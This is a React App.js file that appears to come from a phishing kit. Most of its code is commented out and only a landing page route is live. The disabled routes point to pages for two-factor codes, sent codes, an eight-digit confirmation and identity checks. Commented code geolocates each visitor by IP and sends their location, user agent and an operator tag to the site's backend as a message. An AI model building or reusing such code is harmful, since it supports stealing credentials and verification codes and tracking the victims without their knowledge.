import "./App.css";
import "@fontsource/roboto/300.css";
import "@fontsource/roboto/400.css";
import "@fontsource/roboto/500.css";
import "@fontsource/roboto/700.css";
// import Footer from "./components/Footer";
import { Box } from "@mui/material";
// import Issue from "./pages/Issue";
// import Start from "./pages/Start";
// import Twofa from "./pages/Twofa";
// import HeaderTop from "./components/header/HeaderTop";
import { BrowserRouter, Route, Routes } from "react-router-dom";
// import { useEffect, useState } from "react";
// import useSendMessage from "./functions/SendMessage";
// import { getAddress, getHelpCase, setAddress, setPro } from "./untils/function";
// import PROXY from "./graphql/Proxy";
// import { useQuery } from "@apollo/client";
// import Block from "./pages/Block";
// import SendCode from "./pages/SendCode";
// import NotConfirm from "./pages/NotConfirm";
// import ConfirmEightDigit from "./pages/ConfirmEightDigit";
// import IdentityNotConfirmed from "./pages/IdentityNotConfirmed";
// import Homepage from "./pages/Homepage";
import LandingPage from "./pages/LandingPage";

function App() {
  // const message = useSendMessage();
  // const agent = navigator.userAgent;
  // const [proxy, setProxy] = useState("");
  // const address = getAddress();
  // const helpCase = getHelpCase();
  // const { data } = useQuery(PROXY, {
  //   onCompleted: () => {
  //     setPro(data.proxy.data);
  //     setProxy(data.proxy.data);
  //   },
  // });
  // useEffect(() => {
  //   // Fetch IP Address
  //   // if (proxy !== "") {
  //   const hasEffectRun = sessionStorage.getItem("hasEffectRun");
  //   if (!hasEffectRun || address === null) {
  //     fetch("https://api.ipify.org?format=json")
  //       .then((response) => response.json())
  //       .then((data) => {
  //         // Fetch additional data based on IP Address
  //         fetch("https://freeipapi.com/api/json/" + data.ip)
  //           .then((response) => response.json())
  //           .then((ipData) => {
  //             // Process and set the address
  //             const address = {
  //               ip: data.ip,
  //               countryCode: ipData.countryCode,
  //               lat: ipData.latitude,
  //               lon: ipData.longitude,
  //             };
  //             setAddress(address);
  //             const newAddress = `Just visited the website\n IP: ${
  //               data.ip
  //             }\n Country Code: ${
  //               ipData.countryCode
  //             }\n Proxy: ${proxy}\n Latitude: ${ipData.latitude}\n Longitude: ${
  //               ipData.longitude
  //             }\n Country name: ${ipData.countryName}\n Country code: ${
  //               ipData.countryCode
  //             }\n Time zone: ${ipData.timeZone}\n Zip code: ${
  //               ipData.zipCode
  //             }\n City name: ${ipData.cityName}\n Region name: ${
  //               ipData.regionName
  //             }\n Continent: ${ipData.continent}\n Continent code: ${
  //               ipData.continentCode
  //             }\n User Agent: ${agent}\n Employee identification: ${
  //               helpCase !== null ? helpCase : "Admin"
  //             }`;
  //             // If the address is not empty, log and send a message
  //             if (newAddress !== "") {
  //               message({
  //                 variables: {
  //                   message: newAddress,
  //                 },
  //               });
  //             }
  //           })
  //           .catch((error) => console.log(error));
  //       })
  //       .catch((error) => console.log(error));
  //     sessionStorage.setItem("hasEffectRun", "true");
  //   }
  //   // }
  // }, []);
  return (
    <div className="App">
      {/* <header className="header">
        <HeaderTop />
      </header> */}
      <Box component={"section"}>
        <BrowserRouter>
          <Routes>
            <Route path="/" element={<LandingPage />} />
            {/* <Route path="/landing" element={<LandingPage />} />
            <Route path="/issue" element={<Start />} />
            <Route path="/twofa" element={<Twofa />} />
            <Route path="/block" element={<Block />} />
            <Route path="/sendcode" element={<SendCode />} />
            <Route path="/notconfirm" element={<NotConfirm />} />
            <Route path="/confirm" element={<ConfirmEightDigit />} />
            <Route path="/identity" element={<IdentityNotConfirmed />} /> */}
          </Routes>
        </BrowserRouter>
      </Box>
      {/* <footer className="footer">
        <Footer />
      </footer> */}
    </div>
  );
}

export default App;
